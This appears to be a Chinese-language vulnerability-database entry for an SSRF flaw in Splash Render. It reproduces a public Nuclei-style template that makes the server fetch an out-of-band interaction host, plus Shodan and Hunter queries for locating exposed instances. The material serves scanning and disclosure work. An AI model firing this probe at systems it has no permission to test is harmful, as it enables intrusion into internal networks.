splash-render-ssrf: Splash Render - SSRF

日期: 2025-08-01 | 影响软件: Splash Render | POC: 已公开

漏洞描述

Splash Render is vulnerable to Server-Side Request Forgery (SSRF) Vulnerability.

PoC代码[已公开]

id: splash-render-ssrf

info:
  name: Splash Render - SSRF
  author: pwnhxl
  severity: high
  description: Splash Render is vulnerable to Server-Side Request Forgery (SSRF) Vulnerability.
  reference:
    - https://github.com/scrapinghub/splash
    - https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Splash"
    hunter-query: web.title="Splash" && header="TwistedWeb"
  tags: splash,ssrf,oast,oss,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/render.html?url=https://oast.live"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Interactsh Server'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e87bd05e071e00a236b9817732ec93d2a4e68b797ccfd05c5638a74810bbd0c9022071cb15e4015a25838784593a18d7e242f549c1143796bf6f83d8b9651635221a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐